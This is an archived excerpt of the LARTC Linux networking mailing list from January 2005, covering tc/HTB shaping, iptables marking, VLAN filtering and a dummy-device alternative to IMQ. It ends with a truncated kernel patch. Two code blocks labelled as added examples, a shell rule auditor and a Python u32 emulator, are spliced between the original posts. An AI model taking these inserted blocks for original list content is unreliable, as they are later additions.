> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
>
> I expect data from ssh server to my client 10.190.6.16 should goes into
> 1:11, and other data goes into default 1:13. But when I use ssh client
> on other machine(not 10.190.6.16), the data seems also goes into 1:11(I
> got this from tc -s -d class show dev eth0). Why?

Because you didn't flush the mangle table. Your example works ok for me.
Add a iptables -t mangle -F before running the script.

>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Thu, 27 Jan 2005, CcM wrote:
>
>> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>>
>> tc qdisc add dev eth0 root handle 1: htb default 13
>> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
>> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
>> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
>> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
>> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>>
>> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
>> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>>
>> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
>> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN
>
> I bet you use passive mode in ftp so you get a weird port, not ftp-data
> (20). ftp is tricky to match. You can use this:
> iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
> -j MARK --set-mark 21
> This will mark with 21 all ftp control+data connections.
>
>>
>> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
>> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>>
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> On Wed, 26 Jan 2005, CcM wrote:
>>
>>> It does work! Thanks!
>>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>>>
>>> "Catalin(ux aka Dino) BOIE" wrote:
>>> Use:
>>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>>> --set-mark 20
>>
>> Because local generated packets doesn't go through PREROUTING.
>> But, best is to use OUTPUT.
>>

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
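
The diagnosis in this thread is that MARK rules appended by earlier script runs were still in the mangle table, so ssh to other clients kept getting mark 20. The shell sketch below is an added example, not code from any poster: it scans `iptables-save -t mangle` output for rules that set a given mark but are not the one rule the script intends. The function names and the embedded dump are constructed for illustration.

```shell
#!/bin/sh
# Added example: find leftover MARK rules in a mangle-table dump.
# rule_mark, audit_mark and sample_dump are hypothetical helper names.

# Constructed sample of `iptables-save -t mangle` output (not captured from
# a real host). Newer iptables prints marks as "--set-xmark 0x14/0xffffffff"
# and hosts as "/32"; older versions print "--set-mark 0x14".
sample_dump() {
cat <<'EOF'
*mangle
:PREROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-xmark 0x14/0xffffffff
-A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
-A OUTPUT -d 10.190.6.16/32 -j MARK --set-xmark 0x14/0xffffffff
-A OUTPUT -d 10.190.6.16/32 -j RETURN
-A POSTROUTING -d 10.190.6.16/32 -p tcp -m tcp --sport 20 -j MARK --set-xmark 0x15/0xffffffff
COMMIT
EOF
}

# rule_mark RULE: print the mark a rule sets, as a decimal number.
# The body runs in a subshell so "set -f" and "set --" do not leak out.
rule_mark() (
    set -f                      # no globbing while splitting the rule into words
    set -- $1
    while [ $# -gt 1 ]; do
        case $1 in
            --set-mark|--set-xmark)
                v=${2%%/*}      # "0x14/0xffffffff" -> "0x14"
                # Accept only plain decimal or 0x-hex before doing arithmetic.
                case $v in
                    0[xX]*) d=${v#0?}
                            case $d in ''|*[!0-9a-fA-F]*) exit 1 ;; esac ;;
                    ''|*[!0-9]*) exit 1 ;;
                esac
                echo $(($v))
                exit 0 ;;
        esac
        shift
    done
    exit 1
)

# audit_mark MARK INTENDED < dump
# INTENDED is the match part of the one rule that should set MARK, written
# the way iptables-save prints it but without "/32".
# Prints "stale:" for any other rule setting MARK and "duplicate:" for
# repeated copies of the intended rule. Returns 1 if anything was printed.
audit_mark() {
    want=$1 intended=$2 found=0 seen=0
    while IFS= read -r line; do
        case $line in
            '-A '*' -j MARK '*) ;;
            *) continue ;;
        esac
        m=$(rule_mark "$line") || continue
        [ "$m" -eq "$want" ] || continue
        match=${line%% -j MARK*}
        match=$(printf '%s\n' "$match" | sed 's|/32$||; s|/32 | |g')
        if [ "$match" = "$intended" ]; then
            seen=$((seen + 1))
            [ "$seen" -gt 1 ] || continue
            printf 'duplicate: %s\n' "$line"
        else
            printf 'stale: %s\n' "$line"
        fi
        found=1
    done
    return $found
}

# Demo on the constructed dump. On a live host, pipe in the output of
# `iptables-save -t mangle` instead of sample_dump.
sample_dump | audit_mark 20 '-A OUTPUT -d 10.190.6.16' ||
    echo "leftover rules set mark 20: flush (iptables -t mangle -F) before re-running"
```
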



Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-168428698-1107069982=:63766-- From kamen@cybuild.com Sun Jan 30 09:15:46 2005 From: kamen@cybuild.com (Kamen TOMOV) Date: 30 Jan 2005 11:15:46 +0200 Subject: [LARTC] problem - multiple links to a network Message-ID: <87zmyrz399.fsf@c3po.zlatenlist.net> Hi, I have a Linux machine with kernel 2.6 and 3 network cards. I would like to ask what rules should I have in the routing table so that: 192.168.254.0/25 is routed through eth1 192.168.254.128/25 is routed through eth2 eth0 is my internal interface and eth1/eth2 are the external interfaces. * What is particulary specific for this case is that ipaddr_eth1 is in the same network as ipaddr_eth2 and that ipaddr_gateway_eth1 is the same as ipaddr_gateway_eth2. Here is what I have done so far: r2 root # ip rule ls 0: from all lookup local 32764: from 192.168.254.0/25 lookup 230 32765: from 192.168.254.128/25 lookup 231 32766: from all lookup main 32767: from all lookup default r2 root # ip route ls A.B.C.0/24 dev eth2 proto kernel scope link src A.B.C.X A.B.C.0/24 dev eth1 proto kernel scope link src A.B.C.Y 192.168.254.0/24 dev eth0 proto kernel scope link src 192.168.254.1 default via A.B.C.D dev eth1 r2 root # ip route ls table 230 A.B.C.0/24 dev eth1 scope link src A.B.C.X A.B.C.0/24 dev eth0 scope link src 192.168.254.1 default via A.B.C.D dev eth1 r2 root # ip route ls table 231 A.B.C.0/24 dev eth2 scope link src A.B.C.Y A.B.C.0/24 dev eth0 scope link src 192.168.254.1 default via A.B.C.D dev eth2 As a result the network segment 192.168.254.128/25 does not have access to Internet. Any ideas why? Is it a problem that eth1 is in the same network as eth2? 
Thanks in advance,

--
Kamen TOMOV

From jzhang@cienettechnologies.com Mon Jan 31 06:12:59 2005
From: jzhang@cienettechnologies.com (kingz)
Date: Sun, 30 Jan 2005 22:12:59 -0800
Subject: [LARTC] tc, VLAN, ebtables issue
Message-ID: <000201c5075b$ed8dd1c0$1201a8c0@kingz>

Hi all,

I am testing one QOS system, I want to control bandwidth by VLAN id.

Here is my test network:

Internet Gateway
      |
      |
QOS control box (Bridge box, Redhat 9, 2.4.28 kernel with ebtables-brnf-8_vs_2.4.28 patch)
      |
      |
VLAN Switch
  |      |
  PC     PC

In my QOS control box, it is a bridge box, I used Redhat 9, 2.4.28 kernel with ebtables-brnf-8_vs_2.4.28 patch, and used HTB to control BW. Both sides NICs of the QOS box are e1000, and in normal state, not VLAN tagged.

I created a tagged VLAN for our PCs under the VLAN switch, our PCs can go through the QOS box and Gateway to reach Internet.

On the QOS box, I setup the following rules:

# create class ( use HTB class)
/usr/sbin/tc qdisc del dev eth0 root 2> /dev/null > /dev/null
/usr/sbin/tc qdisc del dev eth1 root 2> /dev/null > /dev/null

/usr/sbin/tc qdisc add dev eth0 root handle 1: htb default 9
/usr/sbin/tc class add dev eth0 parent 1: classid 1:1 htb rate 256kbps ceil 256kbps
/usr/sbin/tc class add dev eth0 parent 1:1 classid 1:9 htb rate 1kbps ceil 256kbps prio 7
## eth0 port class
/usr/sbin/tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1kbps ceil 256kbps prio 0
/usr/sbin/tc qdisc add dev eth0 parent 1:10 handle 10: sfq
/usr/sbin/tc class add dev eth0 parent 1:1 classid 1:11 htb rate 1kbps ceil 3kbps prio 2
/usr/sbin/tc qdisc add dev eth0 parent 1:11 handle 11: sfq

/usr/sbin/tc qdisc add dev eth1 root handle 1: htb default 9
/usr/sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 256kbps ceil 256kbps
/usr/sbin/tc class add dev eth1 parent 1:1 classid 1:9 htb rate 1kbps ceil 256kbps prio 7
## eth1 port class
/usr/sbin/tc class add dev eth1 parent 1:1 classid 1:10 htb rate 1kbps ceil 256kbps prio 0
/usr/sbin/tc qdisc add dev eth1 parent 1:10 handle 10: sfq
/usr/sbin/tc class add dev eth1 parent 1:1 classid 1:11 htb rate 1kbps ceil 2kbps prio 2
/usr/sbin/tc qdisc add dev eth1 parent 1:11 handle 11: sfq

Then mark VLAN traffic:

ebtables -A FORWARD -p 802_1Q --vlan-id 103 -j mark --set-mark 2 --mark-target CONTINUE

Then classify VLAN traffic to the specified class:

/usr/sbin/tc filter add dev eth0 parent 1: protocol ip prio 2 handle 2 fw classid 1:11

But the result is: the VLAN id 103 traffic goes to the default class 1:9, not to the class 1:11 as we expected.

From the stat of ebtables, I can see there are byte counts in the VLAN id 103 mark chain, ebtables marked the VLAN id 103 traffic; but from the stat of class, I can see that no traffic goes to the class 1:11 we expect. It is as if tc cannot classify this marked traffic.

My idea is controlling by VLAN id. Any good idea, comments on my issue? Are my above rules right?

Thanks in advance!

BR
Kingz

From rsenykoff@harrislogic.com Sun Jan 30 15:00:20 2005
From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com)
Date: Sun, 30 Jan 2005 09:00:20 -0600
Subject: [LARTC] PRIO inside HTB - trouble attaching filters correctly?
Message-ID:

Hello everyone!

I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got interactive traffic on the network that I want to give priority (VoIP + Citrix + Video).

I've used the filters in a CBQ script fine, but am having trouble adjusting them to this setup such that they properly assign the traffic.

tc qdisc del root dev $e

tc qdisc add dev $e root handle 1: htb default 3

tc class add dev $e parent 1: classid 1:1 htb rate $wanRate

# now that we've throttled the interface, we create the PRIO queue
tc qdisc add dev $e parent 1:1 handle 10: prio
# instantly creates classes 10:1, 10:2, 10:3

tc qdisc add dev $e parent 10:1 handle 1: pfifo
tc qdisc add dev $e parent 10:2 handle 2: pfifo
tc qdisc add dev $e parent 10:3 handle 3: sfq

############### VoIP ################

# IAX # this is the old format - IAX2 should be what's really seen going on
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 5036 0xffff flowid 10:1
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 5036 0xffff flowid 10:1

# IAX2 #
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 4569 0xffff flowid 10:1
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 4569 0xffff flowid 10:1

# match icmp echo request
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x08 0xff flowid 10:1

# match icmp echo reply
tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type 0x00 0xff flowid 10:1

## etc...........

TIA!
-Ron

From nug@sch.bme.hu Sun Jan 30 17:01:56 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Sun, 30 Jan 2005 18:01:56 +0100
Subject: [LARTC] simple questions about imq
Message-ID: <41FD1304.1080305@sch.bme.hu>

Hi!

I have read all the information i could find, but some things are still not clear.

My setup is:

---INTERNET1(eth0)-\      /- Local net1 (eth2)
                    GW
---INTERNET2(eth1)-/      \- Local net2 (eth3)

I have NAT and a working setup using HTB, SFQ, classifying with the iptables -j CLASSIFY way. I shape only the traffic coming from the internet heading to the intranet.

I would like to have a configuration like this:

---INTERNET1(eth0)-\            /- Local net1 (eth2)
                    GW--imq0
---INTERNET2(eth1)-/            \- Local net2 (eth3)

I think it can be done this way:

iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0
iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0

But it would include traffic heading to the gateway directly, wouldn't it? Can i put these rules to the POSTROUTING chain? And i can still have my CLASSIFY targets in the POSTROUTING chain, because IMQ queueing will happen after it according to http://lartc.org/howto/lartc.imq.html.

So for example:

$IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class 1:30
$IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class 1:30
$IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN
$IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN

If i managed to do this, i promise, i will document it to the imq wiki.

Any advice/help is appreciated!

--
Udv, Nandor

From vincent-perrier@club-internet.fr Sun Jan 30 20:41:35 2005
From: vincent-perrier@club-internet.fr (vincent perrier)
Date: Sun, 30 Jan 2005 21:41:35 +0100
Subject: [LARTC] tc, VLAN, ebtables issue
In-Reply-To: <000201c5075b$ed8dd1c0$1201a8c0@kingz>
References: <000201c5075b$ed8dd1c0$1201a8c0@kingz>
Message-ID: <1107117695.5790.21.camel@localhost.localdomain>

On Mon 31/01/2005 at 07:12, kingz wrote:
> Hi all,
>
> I am testing one QOS system, I want to control bandwidth by VLAN id.

To filter a vlan and put the flow in a class, I use the following code in a C program:

...tc filter add dev %s parent %d:%d prio %d protocol all u32" \
" match u32 0x00008100 0x0000ffff at -8" \
" match u32 0x0%03x0000 0x0fff0000 at -4" \
" flowid %d:%d\n"...

The u32 filter can have negative position indication, here at position -4 there is the vlan number, and at -8 there is the 0X8100 identifying the tag, (the zero position being the start of the ip frame).

This works only if you don't have the very modern ethernet cards that handle the tagged frames at their level. If you have such a card, then you never see the tagged frame, only normal ip frames coming from the "virtual" vlan ethernet devices.

I don't think this is much help but good luck with your problem.

From Snotling@gmx.net Mon Jan 31 00:59:21 2005
From: Snotling@gmx.net ("Marcus Schäfer")
Date: Mon, 31 Jan 2005 01:59:21 +0100 (MET)
Subject: [LARTC] Problem with tcng
Message-ID: <18620.1107133161@www22.gmx.net>

Hi folks,

first of all, sorry for my bad English ^^ and for the fact that I am a Linux N00b.

I have a little Problem installing TCng on my Debian System. At the make install command the following error occurred:

tar: lib/tcng/include/klib/kernel/include: Cannot stat: no such file or directory
tar: Error exit delayed from previous errors

Can somebody help me ?

greets
Marcus
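
Added example (not part of the list posts and not vincent perrier's C program): a Python emulation of the two u32 keys from his reply above, run against constructed frames to show which bytes the negative offsets read and why the filter stops matching once the NIC strips the tag. It assumes, as his post states, that offset 0 is the first byte of the IP header; the device, VLAN id and class are taken from kingz's question, the MAC and IP addresses are made up.

```python
"""Emulation of the two tc u32 keys used to match an 802.1Q tag.

Assumption (from the post): offset 0 is the first byte of the IP header,
so negative offsets reach back into the Ethernet/VLAN header.
All frames below are constructed sample data.
"""
import struct

ETH_HLEN = 14          # dst MAC + src MAC + EtherType
VLAN_HLEN = 4          # TPID (0x8100) + TCI (PCP/DEI/VID)
TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def build_frame(vlan_id=None, pcp=0):
    """Return (frame_bytes, ip_header_offset) for a constructed IPv4 frame."""
    dst = bytes.fromhex("0200000000aa")
    src = bytes.fromhex("0200000000bb")
    # Bare 20-byte IPv4 header, checksum left at 0 (not needed here).
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 22]))
    if vlan_id is None:
        # What the filter sees when the tag was removed before tc runs.
        return dst + src + struct.pack("!H", ETHERTYPE_IPV4) + ip, ETH_HLEN
    tci = ((pcp & 0x7) << 13) | (vlan_id & 0x0FFF)
    hdr = dst + src + struct.pack("!HHH", TPID_8021Q, tci, ETHERTYPE_IPV4)
    return hdr + ip, ETH_HLEN + VLAN_HLEN


def u32_match(frame, ip_off, value, mask, at):
    """One 'match u32 VALUE MASK at OFFSET' key on a big-endian 32-bit word."""
    pos = ip_off + at
    if pos < 0 or pos + 4 > len(frame):
        return False
    (word,) = struct.unpack_from("!I", frame, pos)
    return (word & mask) == (value & mask)


def vlan_keys(vlan_id):
    """The two (value, mask, offset) keys from the post for one VLAN id."""
    if not 0 <= vlan_id <= 0x0FFF:
        raise ValueError("VLAN id must fit in 12 bits")
    return [
        (0x00008100, 0x0000FFFF, -8),     # low 16 bits of the word at -8: TPID
        (vlan_id << 16, 0x0FFF0000, -4),  # word at -4: TCI, PCP/DEI masked off
    ]


def frame_in_vlan(frame, ip_off, vlan_id):
    """True when both keys match, i.e. the filter would select the frame."""
    return all(u32_match(frame, ip_off, v, m, at)
               for v, m, at in vlan_keys(vlan_id))


def tc_filter_cmd(dev, parent, prio, vlan_id, flowid):
    """Render the tc command that the post's C format string produces."""
    (v1, m1, a1), (v2, m2, a2) = vlan_keys(vlan_id)
    return (f"tc filter add dev {dev} parent {parent} prio {prio}"
            f" protocol all u32"
            f" match u32 0x{v1:08x} 0x{m1:08x} at {a1}"
            f" match u32 0x{v2:08x} 0x{m2:08x} at {a2}"
            f" flowid {flowid}")


if __name__ == "__main__":
    tagged, off = build_frame(vlan_id=103, pcp=5)
    untagged, off_u = build_frame()
    print(tc_filter_cmd("eth0", "1:", 2, 103, "1:11"))
    print("tagged VLAN 103, key 103:", frame_in_vlan(tagged, off, 103))
    print("tagged VLAN 103, key 104:", frame_in_vlan(tagged, off, 104))
    print("tag stripped, key 103:   ", frame_in_vlan(untagged, off_u, 103))
```

The 0x0fff0000 mask leaves the three priority bits and the DEI bit out of the comparison, so a frame is classified by VLAN id alone whatever its 802.1p priority.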

From sko@uiuc.edu Mon Jan 31 02:51:26 2005
From: sko@uiuc.edu (Steven Y. Ko)
Date: Sun, 30 Jan 2005 20:51:26 -0600
Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)?
Message-ID: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu>

Hi,

I'm wondering if there's any simple solution. This problem looks very simple, so maybe there's a simple solution that I'm missing, but I couldn't do it yet.

I'm configuring a wireless ad-hoc network with three laptops;

A ---- B ---- C

where A and C can only talk to B, and B can talk to both A and C. A and C cannot talk to each other. I'd like to configure B so that A can talk to C via B (and vice versa).

The addresses are,

A: 192.168.0.1
B: 192.168.0.2
C: 192.168.0.3

Since this is a wireless ad-hoc network, every machine has only one (wireless) interface, so B should receive a packet through its interface eth0 and forward it through eth0 again.

Currently, A, B, and C only have the same basic routing table;

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.0.0     *               255.255.255.0   U     0      0        0 eth0
169.254.0.0     *               255.255.0.0     U     0      0        0 eth0
127.0.0.0       *               255.0.0.0       U     0      0        0 lo

B cannot forward packets with this routing table. Is there any solution?

Thanks,
Steve

From beatlelittle@yahoo.com.cn Mon Jan 31 03:26:29 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Mon, 31 Jan 2005 11:26:29 +0800 (CST)
Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files?
Message-ID: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com>

I'm trying to get picture from ethloop and gnuplot. But the output seems weird. I still do not know why and want some examples.

Thanks in advance.

From 64vn@cardvn.net Mon Jan 31 04:21:03 2005
From: 64vn@cardvn.net (Nguyen Dinh Nam)
Date: Mon, 31 Jan 2005 11:21:03 +0700
Subject: [LARTC] [Fwd: dummy as IMQ replacement]
Message-ID: <41FDB22F.2060000@cardvn.net>

Subject: dummy as IMQ replacement
From: Jamal Hadi Salim
Reply-To: hadi@znyx.com
To: netdev@oss.sgi.com
Cc: Nguyen Dinh Nam, Remus, Andre Tomt, syrius.ml@no-log.org, Andy Furniss, Damion de Soto
Organization: ZNYX Networks
Message-Id: <1107123123.8021.80.camel@jzny.localdomain>
Date: 30 Jan 2005 17:12:04 -0500

This is in relation to providing functionality that IMQ was intending to using the dummy device and tc actions. I've copied as many people as i could dig who i know may have interest in this. Please forward this to any other list which may have interest in the subject. It still needs some cleaning up; however, i don't wanna sit on it for another year - and now that mirred is out there, this is a good time.

Advantage over current IMQ; cleaner in particular in SMP; with a _lot_ less code. Old Dummy device functionality is preserved while new one only kicks in if you use actions.
Didn't have to write a new device and finally made a real dumb device to be a little smarter ;->

IMQ USES
--------

As far as i know the reasons listed below are why people use IMQ. It would be nice to know of anything else that i missed because this is the requirements list i used.

1) qdiscs/policies that are per device as opposed to system wide. IMQ allows for sharing across multiple devices.

2) Allows for queueing incoming traffic for shaping instead of dropping. I am not aware of any study that shows policing is worse than shaping in achieving the end goal of rate control. I would be interested if anyone is experimenting. Nevertheless, this is still an alternative as opposed to making a system wide ingress change.

3) Very interesting use: if you are serving p2p you may wanna give preference to your own locally originated traffic (when responses come back) vs someone using your system to do bittorrent. So QoSing based on state comes in as the solution. What people did to achieve this was stick the IMQ somewhere prelocal hook. I think this is a pretty neat feature to have in Linux in general (i.e. not just for IMQ). But i won't go back to putting netfilter hooks in the device to satisfy this. I also don't think it's worth it hacking dummy some more to be aware of say L3 info and play ip rule tricks to achieve this.
--> Instead the plan is to have a contrack related action. This action will selectively either query/create contrack state on incoming packets. Packets could then be redirected to dummy based on what happens -> e.g. on incoming packets; if we find they are of known state we could send to a different queue than one which didn't have existing state. This all however is dependent on whatever rules the admin enters.

What you can do with dummy currently with actions
--------------------------------------------------

Let's say you are policing packets from alias 192.168.200.200/32 you don't want those to exceed 100kbps going out.

tc filter add dev eth0 parent 1: protocol ip prio 10 u32 \
match ip src 192.168.200.200/32 flowid 1:2 \
action police rate 100kbit burst 90k drop

If you run tcpdump on eth0 you will see all packets going out with src 192.168.200.200/32 dropped or not.
Extend the rule a little to see only the ones that made it out:

tc filter add dev eth0 parent 1: protocol ip prio 10 u32 \
match ip src 192.168.200.200/32 flowid 1:2 \
action police rate 10kbit burst 90k drop \
action mirred egress mirror dev dummy0

Now fire tcpdump on dummy0 to see only those packets ..
tcpdump -n -i dummy0 -x -e -t

Essentially a good debugging/logging interface.

If you replace mirror with redirect, those packets will be blackholed and will never make it out. This redirect behavior changes with new patch (but not the mirror).

What you can do with dummy and attached patch
----------------------------------------------

Essentially provide functionality that most people use IMQ; sample below:

--------
export TC="/sbin/tc"

$TC qdisc add dev dummy0 root handle 1: prio
$TC qdisc add dev dummy0 parent 1:1 handle 10: sfq
$TC qdisc add dev dummy0 parent 1:2 handle 20: tbf rate 20kbit buffer 1600 limit 3000
$TC qdisc add dev dummy0 parent 1:3 handle 30: sfq
$TC filter add dev dummy0 protocol ip pref 1 parent 1: handle 1 fw classid 1:1
$TC filter add dev dummy0 protocol ip pref 2 parent 1: handle 2 fw classid 1:2

ifconfig dummy0 up

$TC qdisc add dev eth0 ingress

# redirect all IP packets arriving in eth0 to dummy0
# use mark 1 --> puts them onto class 1:1
$TC filter add dev eth0 parent ffff: protocol ip prio 10 u32 \
match u32 0 0 flowid 1:1 \
action ipt -j MARK --set-mark 1 \
action mirred egress redirect dev dummy0
--------

Run a little test: from another machine ping so that you have packets going into the box:

-----
[root@jzny action-tests]# ping 10.22
PING 10.22 (10.0.0.22): 56 data bytes
64 bytes from 10.0.0.22: icmp_seq=0 ttl=64 time=2.8 ms
64 bytes from 10.0.0.22: icmp_seq=1 ttl=64 time=0.6 ms
64 bytes from 10.0.0.22: icmp_seq=2 ttl=64 time=0.6 ms

--- 10.22 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.6/1.3/2.8 ms
[root@jzny action-tests]#
-----

Now look at some stats:

---
[root@jmandrake]:~# $TC -s filter show parent ffff: dev eth0
filter protocol ip pref 10 u32
filter protocol ip pref 10 u32 fh 800: ht divisor 1
filter protocol ip pref 10 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:1
  match 00000000/00000000 at 0
        action order 1: tablename: mangle hook: NF_IP_PRE_ROUTING
        target MARK set 0x1
        index 1 ref 1 bind 1 installed 4195sec used 27sec
        Sent 252 bytes 3 pkts (dropped 0, overlimits 0)

        action order 2: mirred (Egress Redirect to device dummy0) stolen
        index 1 ref 1 bind 1 installed 165 sec used 27 sec
        Sent 252 bytes 3 pkts (dropped 0, overlimits 0)

[root@jmandrake]:~# $TC -s qdisc
qdisc sfq 30: dev dummy0 limit 128p quantum 1514b
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
qdisc tbf 20: dev dummy0 rate 20Kbit burst 1575b lat 2147.5s
 Sent 210 bytes 3 pkts (dropped 0, overlimits 0)
qdisc sfq 10: dev dummy0 limit 128p quantum 1514b
 Sent 294 bytes 3 pkts (dropped 0, overlimits 0)
qdisc prio 1: dev dummy0 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
 Sent 504 bytes 6 pkts (dropped 0, overlimits 0)
qdisc ingress ffff: dev eth0 ----------------
 Sent 308 bytes 5 pkts (dropped 0, overlimits 0)

[root@jmandrake]:~# ifconfig dummy0
dummy0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
          UP BROADCAST RUNNING NOARP  MTU:1500  Metric:1
          RX packets:6 errors:0 dropped:3 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:32
          RX bytes:504 (504.0 b)  TX bytes:252 (252.0 b)
-----

Dummy continues to behave like it always did. You send it any packet not originating from the actions it will drop them. [In this case the three dropped packets were ipv6 ndisc].
My goal here is to start a discussion to see if people agree this is a good replacement for IMQ or whether to go another path. Clearly i would prefer to have this change in, but I am not religious and would listen to reason about how it should be done as long as no uneccessary clutter happens. Patch attached. cheers, jamal --=-69HkpMiEza1wGz3le8L6 Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=dummy-act-2611rc1 Content-Type: text/plain; name=dummy-act-2611rc1; charset=ISO-8859-1 --- a/drivers/net/dummy.c.orig 2004-12-24 16:34:33.000000000 -0500 +++ b/drivers/net/dummy.c 2005-01-18 06:43:47.000000000 -0500 @@ -26,7 +26,14 @@ Nick Holloway, 27th May 1994 [I tweaked this explanation a little but that's all] Alan Cox, 30th May 1994 + */ +/* + * This driver isnt abused enough ;-> + * Here to add only _just_ a _feeew more_ features, + * 10 years after AC added comment above ;-> hehe - JHS +*/ + #include #include 
@@ -35,11 +42,128 @@ #include #include #include +#ifdef CONFIG_NET_CLS_ACT +#include +#endif + +#define TX_TIMEOUT (2*HZ) + +#define TX_Q_LIMIT 32 +struct dummy_private { + struct net_device_stats stats; +#ifdef CONFIG_NET_CLS_ACT + struct tasklet_struct dummy_tasklet; + int tasklet_pending; + /* mostly debug stats leave in for now */ + unsigned long stat_r1; + unsigned long stat_r2; + unsigned long stat_r3; + unsigned long stat_r4; + unsigned long stat_r5; + unsigned long stat_r6; + unsigned long stat_r7; + unsigned long stat_r8; + struct sk_buff_head rq; + struct sk_buff_head tq; +#endif +}; + +#ifdef CONFIG_NET_CLS_ACT +static void ri_tasklet(unsigned long dev); +#endif + static int numdummies = 1; static int dummy_xmit(struct sk_buff *skb, struct net_device *dev); static struct net_device_stats *dummy_get_stats(struct net_device *dev); +static void dummy_timeout(struct net_device *dev); +static int dummy_open(struct net_device *dev); +static int dummy_close(struct net_device *dev); + +static void dummy_timeout(struct net_device *dev) { + + int cpu = smp_processor_id(); + + dev->trans_start = jiffies; + printk("%s: BUG tx timeout on CPU %d\n",dev->name,cpu); + if (spin_is_locked((&dev->xmit_lock))) + printk("xmit lock grabbed already\n"); + if (spin_is_locked((&dev->queue_lock))) + printk("queue lock grabbed already\n"); +} + +#ifdef CONFIG_NET_CLS_ACT +static void ri_tasklet(unsigned long dev) { + + struct net_device *dv = (struct net_device *)dev; + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; + struct sk_buff *skb = NULL; + + dp->stat_r4 +=1; + if (NULL == (skb = skb_peek(&dp->tq))) { + dp->stat_r5 +=1; + if (spin_trylock(&dv->xmit_lock)) { + dp->stat_r8 +=1; + while (NULL != (skb = skb_dequeue(&dp->rq))) { + skb_queue_tail(&dp->tq, skb); + } + spin_unlock(&dv->xmit_lock); + } else { + /* reschedule */ + dp->stat_r1 +=1; + goto resched; + } + } + + while (NULL != (skb = skb_dequeue(&dp->tq))) { + 
